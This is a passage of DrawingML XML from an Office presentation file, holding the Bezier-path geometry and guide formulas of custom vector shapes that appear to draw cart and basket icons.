                    <a:pt x="289" y="515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="515"/>
                    <a:pt x="237" y="540"/>
                    <a:pt x="233" y="552"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="214" y="552"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="246" y="552"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="543"/>
                    <a:pt x="259" y="527"/>
                    <a:pt x="289" y="527"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="527"/>
                    <a:pt x="328" y="543"/>
                    <a:pt x="332" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="552"/>
                    <a:pt x="258" y="552"/>
                    <a:pt x="246" y="5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DABF8FEB-A7C9-4BEF-9251-C7C00462BC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932726" flipH="1" flipV="1">
              <a:off x="10489459" y="4413740"/>
              <a:ext cx="752475" cy="655637"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 60 w 200"/>
                <a:gd name="T1" fmla="*/ 106 h 174"/>
                <a:gd name="T2" fmla="*/ 62 w 200"/>
                <a:gd name="T3" fmla="*/ 114 h 174"/>
                <a:gd name="T4" fmla="*/ 192 w 200"/>
                <a:gd name="T5" fmla="*/ 126 h 174"/>
                <a:gd name="T6" fmla="*/ 53 w 200"/>
                <a:gd name="T7" fmla="*/ 98 h 174"/>
                <a:gd name="T8" fmla="*/ 20 w 200"/>
                <a:gd name="T9" fmla="*/ 16 h 174"/>
                <a:gd name="T10" fmla="*/ 10 w 200"/>
                <a:gd name="T11" fmla="*/ 0 h 174"/>
                <a:gd name="T12" fmla="*/ 33 w 200"/>
                <a:gd name="T13" fmla="*/ 8 h 174"/>
                <a:gd name="T14" fmla="*/ 191 w 200"/>
                <a:gd name="T15" fmla="*/ 28 h 174"/>
                <a:gd name="T16" fmla="*/ 191 w 200"/>
                <a:gd name="T17" fmla="*/ 39 h 174"/>
                <a:gd name="T18" fmla="*/ 191 w 200"/>
                <a:gd name="T19" fmla="*/ 36 h 174"/>
                <a:gd name="T20" fmla="*/ 191 w 200"/>
                <a:gd name="T21" fmla="*/ 41 h 174"/>
                <a:gd name="T22" fmla="*/ 200 w 200"/>
                <a:gd name="T23" fmla="*/ 39 h 174"/>
                <a:gd name="T24" fmla="*/ 200 w 200"/>
                <a:gd name="T25" fmla="*/ 91 h 174"/>
                <a:gd name="T26" fmla="*/ 76 w 200"/>
                <a:gd name="T27" fmla="*/ 98 h 174"/>
                <a:gd name="T28" fmla="*/ 62 w 200"/>
                <a:gd name="T29" fmla="*/ 98 h 174"/>
                <a:gd name="T30" fmla="*/ 72 w 200"/>
                <a:gd name="T31" fmla="*/ 73 h 174"/>
                <a:gd name="T32" fmla="*/ 65 w 200"/>
                <a:gd name="T33" fmla="*/ 31 h 174"/>
                <a:gd name="T34" fmla="*/ 66 w 200"/>
                <a:gd name="T35" fmla="*/ 41 h 174"/>
                <a:gd name="T36" fmla="*/ 47 w 200"/>
                <a:gd name="T37" fmla="*/ 47 h 174"/>
                <a:gd name="T38" fmla="*/ 67 w 200"/>
                <a:gd name="T39" fmla="*/ 47 h 174"/>
                <a:gd name="T40" fmla="*/ 53 w 200"/>
                <a:gd name="T41" fmla="*/ 67 h 174"/>
                <a:gd name="T42" fmla="*/ 96 w 200"/>
                <a:gd name="T43" fmla="*/ 32 h 174"/>
                <a:gd name="T44" fmla="*/ 96 w 200"/>
                <a:gd name="T45" fmla="*/ 41 h 174"/>
                <a:gd name="T46" fmla="*/ 74 w 200"/>
                <a:gd name="T47" fmla="*/ 47 h 174"/>
                <a:gd name="T48" fmla="*/ 97 w 200"/>
                <a:gd name="T49" fmla="*/ 47 h 174"/>
                <a:gd name="T50" fmla="*/ 77 w 200"/>
                <a:gd name="T51" fmla="*/ 67 h 174"/>
                <a:gd name="T52" fmla="*/ 98 w 200"/>
                <a:gd name="T53" fmla="*/ 73 h 174"/>
                <a:gd name="T54" fmla="*/ 99 w 200"/>
                <a:gd name="T55" fmla="*/ 79 h 174"/>
                <a:gd name="T56" fmla="*/ 80 w 200"/>
                <a:gd name="T57" fmla="*/ 85 h 174"/>
                <a:gd name="T58" fmla="*/ 99 w 200"/>
                <a:gd name="T59" fmla="*/ 85 h 174"/>
                <a:gd name="T60" fmla="*/ 103 w 200"/>
                <a:gd name="T61" fmla="*/ 41 h 174"/>
                <a:gd name="T62" fmla="*/ 129 w 200"/>
                <a:gd name="T63" fmla="*/ 47 h 174"/>
                <a:gd name="T64" fmla="*/ 129 w 200"/>
                <a:gd name="T65" fmla="*/ 54 h 174"/>
                <a:gd name="T66" fmla="*/ 104 w 200"/>
                <a:gd name="T67" fmla="*/ 60 h 174"/>
                <a:gd name="T68" fmla="*/ 129 w 200"/>
                <a:gd name="T69" fmla="*/ 60 h 174"/>
                <a:gd name="T70" fmla="*/ 105 w 200"/>
                <a:gd name="T71" fmla="*/ 79 h 174"/>
                <a:gd name="T72" fmla="*/ 131 w 200"/>
                <a:gd name="T73" fmla="*/ 85 h 174"/>
                <a:gd name="T74" fmla="*/ 131 w 200"/>
                <a:gd name="T75" fmla="*/ 96 h 174"/>
                <a:gd name="T76" fmla="*/ 134 w 200"/>
                <a:gd name="T77" fmla="*/ 34 h 174"/>
                <a:gd name="T78" fmla="*/ 163 w 200"/>
                <a:gd name="T79" fmla="*/ 35 h 174"/>
                <a:gd name="T80" fmla="*/ 135 w 200"/>
                <a:gd name="T81" fmla="*/ 54 h 174"/>
                <a:gd name="T82" fmla="*/ 163 w 200"/>
                <a:gd name="T83" fmla="*/ 60 h 174"/>
                <a:gd name="T84" fmla="*/ 163 w 200"/>
                <a:gd name="T85" fmla="*/ 67 h 174"/>
                <a:gd name="T86" fmla="*/ 136 w 200"/>
                <a:gd name="T87" fmla="*/ 73 h 174"/>
                <a:gd name="T88" fmla="*/ 163 w 200"/>
                <a:gd name="T89" fmla="*/ 73 h 174"/>
                <a:gd name="T90" fmla="*/ 137 w 200"/>
                <a:gd name="T91" fmla="*/ 96 h 174"/>
                <a:gd name="T92" fmla="*/ 191 w 200"/>
                <a:gd name="T93" fmla="*/ 47 h 174"/>
                <a:gd name="T94" fmla="*/ 191 w 200"/>
                <a:gd name="T95" fmla="*/ 54 h 174"/>
                <a:gd name="T96" fmla="*/ 169 w 200"/>
                <a:gd name="T97" fmla="*/ 60 h 174"/>
                <a:gd name="T98" fmla="*/ 191 w 200"/>
                <a:gd name="T99" fmla="*/ 60 h 174"/>
                <a:gd name="T100" fmla="*/ 169 w 200"/>
                <a:gd name="T101" fmla="*/ 79 h 174"/>
                <a:gd name="T102" fmla="*/ 191 w 200"/>
                <a:gd name="T103" fmla="*/ 85 h 174"/>
                <a:gd name="T104" fmla="*/ 191 w 200"/>
                <a:gd name="T105" fmla="*/ 95 h 174"/>
                <a:gd name="T106" fmla="*/ 191 w 200"/>
                <a:gd name="T107" fmla="*/ 85 h 174"/>
                <a:gd name="T108" fmla="*/ 85 w 200"/>
                <a:gd name="T109" fmla="*/ 174 h 174"/>
                <a:gd name="T110" fmla="*/ 85 w 200"/>
                <a:gd name="T111" fmla="*/ 163 h 174"/>
                <a:gd name="T112" fmla="*/ 76 w 200"/>
                <a:gd name="T113" fmla="*/ 153 h 174"/>
                <a:gd name="T114" fmla="*/ 191 w 200"/>
                <a:gd name="T115" fmla="*/ 153 h 174"/>
                <a:gd name="T116" fmla="*/ 171 w 200"/>
                <a:gd name="T117" fmla="*/ 133 h 174"/>
                <a:gd name="T118" fmla="*/ 171 w 200"/>
                <a:gd name="T119" fmla="*/ 14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0" h="174">
                  <a:moveTo>
                    <a:pt x="191" y="102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="102"/>
                    <a:pt x="191" y="102"/>
                    <a:pt x="191" y="102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4" y="106"/>
                    <a:pt x="53" y="114"/>
                    <a:pt x="61" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="114"/>
                    <a:pt x="61" y="114"/>
                    <a:pt x="6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5" y="114"/>
                    <a:pt x="197" y="116"/>
                    <a:pt x="197" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="121"/>
                    <a:pt x="195" y="126"/>
                    <a:pt x="192" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="126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40" y="126"/>
                    <a:pt x="42" y="98"/>
                    <a:pt x="53" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="98"/>
                    <a:pt x="53" y="98"/>
                    <a:pt x="54" y="98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9"/>
                    <a:pt x="15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19" y="4"/>
                    <a:pt x="20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91" y="28"/>
                    <a:pt x="200" y="29"/>
                    <a:pt x="200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91" y="36"/>
                    <a:pt x="191" y="36"/>
                    <a:pt x="191" y="36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39"/>
                    <a:pt x="199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39"/>
                    <a:pt x="200" y="39"/>
                    <a:pt x="200" y="39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102"/>
                    <a:pt x="191" y="102"/>
                    <a:pt x="191" y="102"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="62" y="98"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="98"/>
                    <a:pt x="76" y="98"/>
                    <a:pt x="76" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="85"/>
                    <a:pt x="74" y="85"/>
                    <a:pt x="74" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="85"/>
                    <a:pt x="58" y="85"/>
                    <a:pt x="58" y="85"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="62" y="98"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57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54" y="73"/>
                    <a:pt x="54" y="73"/>
                    <a:pt x="54" y="73"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57" y="79"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="65" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="30"/>
                    <a:pt x="42" y="30"/>
                    <a:pt x="42" y="30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66" y="41"/>
                    <a:pt x="66" y="41"/>
                    <a:pt x="66" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="65" y="31"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="67" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="47"/>
                    <a:pt x="47" y="47"/>
                    <a:pt x="47" y="47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8" y="54"/>
                    <a:pt x="68" y="54"/>
                    <a:pt x="68" y="54"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="67" y="47"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="69" y="60"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="60"/>
                    <a:pt x="50" y="60"/>
                    <a:pt x="50" y="60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71" y="67"/>
                    <a:pt x="71" y="67"/>
                    <a:pt x="71" y="67"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69" y="60"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="96" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="31"/>
                    <a:pt x="71" y="31"/>
                    <a:pt x="71" y="3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96" y="41"/>
                    <a:pt x="96" y="41"/>
                    <a:pt x="96" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="32"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="97" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="47"/>
                    <a:pt x="74" y="47"/>
                    <a:pt x="74" y="47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97" y="54"/>
                    <a:pt x="97" y="54"/>
                    <a:pt x="97" y="54"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="47"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="97" y="60"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="60"/>
                    <a:pt x="76" y="60"/>
                    <a:pt x="76" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="67"/>
                    <a:pt x="77" y="67"/>
                    <a:pt x="77" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="67"/>
                    <a:pt x="98" y="67"/>
                    <a:pt x="98" y="67"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="60"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="98" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="73"/>
                    <a:pt x="78" y="73"/>
                    <a:pt x="78" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="79"/>
                    <a:pt x="79" y="79"/>
                    <a:pt x="79" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="79"/>
                    <a:pt x="99" y="79"/>
                    <a:pt x="99" y="79"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="73"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="99" y="85"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="85"/>
                    <a:pt x="80" y="85"/>
                    <a:pt x="80" y="85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99" y="97"/>
                    <a:pt x="99" y="97"/>
                    <a:pt x="99" y="97"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="85"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="128" y="33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3" y="41"/>
                    <a:pt x="103" y="41"/>
                    <a:pt x="103" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="41"/>
                    <a:pt x="129" y="41"/>
                    <a:pt x="129" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="128" y="33"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="129" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="47"/>
                    <a:pt x="103" y="47"/>
                    <a:pt x="103" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="54"/>
                    <a:pt x="103" y="54"/>
                    <a:pt x="103" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="54"/>
                    <a:pt x="129" y="54"/>
                    <a:pt x="129" y="54"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="129" y="47"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="129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30" y="67"/>
                    <a:pt x="130" y="67"/>
                    <a:pt x="130" y="67"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="129" y="60"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="130" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="73"/>
                    <a:pt x="104" y="73"/>
                    <a:pt x="104" y="73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30" y="79"/>
                    <a:pt x="130" y="79"/>
                    <a:pt x="130" y="79"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="130" y="73"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="131" y="85"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="85"/>
                    <a:pt x="105" y="85"/>
                    <a:pt x="105" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="97"/>
                    <a:pt x="106" y="97"/>
                    <a:pt x="106" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="96"/>
                    <a:pt x="131" y="96"/>
                    <a:pt x="131" y="96"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="131" y="85"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="163" y="35"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="34"/>
                    <a:pt x="134" y="34"/>
                    <a:pt x="134" y="3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63" y="41"/>
                    <a:pt x="163" y="41"/>
                    <a:pt x="163" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="163" y="35"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="163" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="47"/>
                    <a:pt x="135" y="47"/>
                    <a:pt x="135" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="54"/>
                    <a:pt x="135" y="54"/>
                    <a:pt x="135" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="54"/>
                    <a:pt x="163" y="54"/>
                    <a:pt x="163" y="54"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="163" y="47"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="163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63" y="67"/>
                    <a:pt x="163" y="67"/>
                    <a:pt x="163" y="67"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="163" y="60"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="163" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="73"/>
                    <a:pt x="136" y="73"/>
                    <a:pt x="136" y="73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63" y="79"/>
                    <a:pt x="163" y="79"/>
                    <a:pt x="163" y="79"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="163" y="73"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="163" y="85"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="85"/>
                    <a:pt x="137" y="85"/>
                    <a:pt x="137" y="85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63" y="96"/>
                    <a:pt x="163" y="96"/>
                    <a:pt x="163" y="96"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="163" y="85"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="191" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="47"/>
                    <a:pt x="169" y="47"/>
                    <a:pt x="169" y="47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91" y="54"/>
                    <a:pt x="191" y="54"/>
                    <a:pt x="191" y="54"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="191" y="47"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="191" y="60"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="60"/>
                    <a:pt x="169" y="60"/>
                    <a:pt x="169" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="67"/>
                    <a:pt x="169" y="67"/>
                    <a:pt x="169" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="67"/>
                    <a:pt x="191" y="67"/>
                    <a:pt x="191" y="67"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="191" y="60"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="191" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="73"/>
                    <a:pt x="169" y="73"/>
                    <a:pt x="169" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="79"/>
                    <a:pt x="169" y="79"/>
                    <a:pt x="169" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="79"/>
                    <a:pt x="191" y="79"/>
                    <a:pt x="191" y="79"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="191" y="73"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="191" y="85"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="85"/>
                    <a:pt x="169" y="85"/>
                    <a:pt x="169" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="95"/>
                    <a:pt x="169" y="95"/>
                    <a:pt x="169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1"/>
                    <a:pt x="191" y="91"/>
                    <a:pt x="191" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="191" y="85"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="85" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="133"/>
                    <a:pt x="106" y="142"/>
                    <a:pt x="106" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="164"/>
                    <a:pt x="97" y="174"/>
                    <a:pt x="85" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="174"/>
                    <a:pt x="65" y="164"/>
                    <a:pt x="65" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="142"/>
                    <a:pt x="74" y="133"/>
                    <a:pt x="85" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="85" y="163"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="163"/>
                    <a:pt x="95" y="158"/>
                    <a:pt x="95" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="148"/>
                    <a:pt x="90" y="144"/>
                    <a:pt x="85" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="144"/>
                    <a:pt x="76" y="148"/>
                    <a:pt x="76" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="158"/>
                    <a:pt x="80" y="163"/>
                    <a:pt x="85" y="163"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="171" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="133"/>
                    <a:pt x="191" y="142"/>
                    <a:pt x="191" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="164"/>
                    <a:pt x="182" y="174"/>
                    <a:pt x="171" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="174"/>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="142"/>
                    <a:pt x="159" y="133"/>
                    <a:pt x="171" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="171" y="163"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="163"/>
                    <a:pt x="180" y="158"/>
                    <a:pt x="180" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="148"/>
                    <a:pt x="176" y="144"/>
                    <a:pt x="171" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="144"/>
                    <a:pt x="161" y="148"/>
                    <a:pt x="161" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="158"/>
                    <a:pt x="165" y="163"/>
                    <a:pt x="17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72D3F08F-B85C-4F32-8AE7-571178CA53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5145695" flipH="1" flipV="1">
              <a:off x="9171224" y="3715572"/>
              <a:ext cx="739775" cy="606425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 186 w 197"/>
                <a:gd name="T1" fmla="*/ 92 h 161"/>
                <a:gd name="T2" fmla="*/ 185 w 197"/>
                <a:gd name="T3" fmla="*/ 98 h 161"/>
                <a:gd name="T4" fmla="*/ 173 w 197"/>
                <a:gd name="T5" fmla="*/ 141 h 161"/>
                <a:gd name="T6" fmla="*/ 144 w 197"/>
                <a:gd name="T7" fmla="*/ 161 h 161"/>
                <a:gd name="T8" fmla="*/ 55 w 197"/>
                <a:gd name="T9" fmla="*/ 161 h 161"/>
                <a:gd name="T10" fmla="*/ 26 w 197"/>
                <a:gd name="T11" fmla="*/ 141 h 161"/>
                <a:gd name="T12" fmla="*/ 15 w 197"/>
                <a:gd name="T13" fmla="*/ 98 h 161"/>
                <a:gd name="T14" fmla="*/ 14 w 197"/>
                <a:gd name="T15" fmla="*/ 93 h 161"/>
                <a:gd name="T16" fmla="*/ 0 w 197"/>
                <a:gd name="T17" fmla="*/ 76 h 161"/>
                <a:gd name="T18" fmla="*/ 16 w 197"/>
                <a:gd name="T19" fmla="*/ 61 h 161"/>
                <a:gd name="T20" fmla="*/ 38 w 197"/>
                <a:gd name="T21" fmla="*/ 61 h 161"/>
                <a:gd name="T22" fmla="*/ 38 w 197"/>
                <a:gd name="T23" fmla="*/ 60 h 161"/>
                <a:gd name="T24" fmla="*/ 68 w 197"/>
                <a:gd name="T25" fmla="*/ 7 h 161"/>
                <a:gd name="T26" fmla="*/ 83 w 197"/>
                <a:gd name="T27" fmla="*/ 3 h 161"/>
                <a:gd name="T28" fmla="*/ 87 w 197"/>
                <a:gd name="T29" fmla="*/ 17 h 161"/>
                <a:gd name="T30" fmla="*/ 63 w 197"/>
                <a:gd name="T31" fmla="*/ 61 h 161"/>
                <a:gd name="T32" fmla="*/ 132 w 197"/>
                <a:gd name="T33" fmla="*/ 61 h 161"/>
                <a:gd name="T34" fmla="*/ 108 w 197"/>
                <a:gd name="T35" fmla="*/ 17 h 161"/>
                <a:gd name="T36" fmla="*/ 112 w 197"/>
                <a:gd name="T37" fmla="*/ 3 h 161"/>
                <a:gd name="T38" fmla="*/ 126 w 197"/>
                <a:gd name="T39" fmla="*/ 7 h 161"/>
                <a:gd name="T40" fmla="*/ 156 w 197"/>
                <a:gd name="T41" fmla="*/ 60 h 161"/>
                <a:gd name="T42" fmla="*/ 157 w 197"/>
                <a:gd name="T43" fmla="*/ 61 h 161"/>
                <a:gd name="T44" fmla="*/ 181 w 197"/>
                <a:gd name="T45" fmla="*/ 61 h 161"/>
                <a:gd name="T46" fmla="*/ 197 w 197"/>
                <a:gd name="T47" fmla="*/ 76 h 161"/>
                <a:gd name="T48" fmla="*/ 186 w 197"/>
                <a:gd name="T49" fmla="*/ 92 h 161"/>
                <a:gd name="T50" fmla="*/ 69 w 197"/>
                <a:gd name="T51" fmla="*/ 133 h 161"/>
                <a:gd name="T52" fmla="*/ 60 w 197"/>
                <a:gd name="T53" fmla="*/ 98 h 161"/>
                <a:gd name="T54" fmla="*/ 49 w 197"/>
                <a:gd name="T55" fmla="*/ 92 h 161"/>
                <a:gd name="T56" fmla="*/ 43 w 197"/>
                <a:gd name="T57" fmla="*/ 102 h 161"/>
                <a:gd name="T58" fmla="*/ 53 w 197"/>
                <a:gd name="T59" fmla="*/ 137 h 161"/>
                <a:gd name="T60" fmla="*/ 63 w 197"/>
                <a:gd name="T61" fmla="*/ 143 h 161"/>
                <a:gd name="T62" fmla="*/ 69 w 197"/>
                <a:gd name="T63" fmla="*/ 133 h 161"/>
                <a:gd name="T64" fmla="*/ 107 w 197"/>
                <a:gd name="T65" fmla="*/ 99 h 161"/>
                <a:gd name="T66" fmla="*/ 99 w 197"/>
                <a:gd name="T67" fmla="*/ 91 h 161"/>
                <a:gd name="T68" fmla="*/ 90 w 197"/>
                <a:gd name="T69" fmla="*/ 99 h 161"/>
                <a:gd name="T70" fmla="*/ 90 w 197"/>
                <a:gd name="T71" fmla="*/ 135 h 161"/>
                <a:gd name="T72" fmla="*/ 99 w 197"/>
                <a:gd name="T73" fmla="*/ 143 h 161"/>
                <a:gd name="T74" fmla="*/ 107 w 197"/>
                <a:gd name="T75" fmla="*/ 135 h 161"/>
                <a:gd name="T76" fmla="*/ 107 w 197"/>
                <a:gd name="T77" fmla="*/ 99 h 161"/>
                <a:gd name="T78" fmla="*/ 135 w 197"/>
                <a:gd name="T79" fmla="*/ 143 h 161"/>
                <a:gd name="T80" fmla="*/ 145 w 197"/>
                <a:gd name="T81" fmla="*/ 137 h 161"/>
                <a:gd name="T82" fmla="*/ 155 w 197"/>
                <a:gd name="T83" fmla="*/ 102 h 161"/>
                <a:gd name="T84" fmla="*/ 149 w 197"/>
                <a:gd name="T85" fmla="*/ 92 h 161"/>
                <a:gd name="T86" fmla="*/ 138 w 197"/>
                <a:gd name="T87" fmla="*/ 98 h 161"/>
                <a:gd name="T88" fmla="*/ 128 w 197"/>
                <a:gd name="T89" fmla="*/ 133 h 161"/>
                <a:gd name="T90" fmla="*/ 135 w 197"/>
                <a:gd name="T91" fmla="*/ 14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7" h="161">
                  <a:moveTo>
                    <a:pt x="186" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="94"/>
                    <a:pt x="186" y="96"/>
                    <a:pt x="185" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="141"/>
                    <a:pt x="173" y="141"/>
                    <a:pt x="173" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
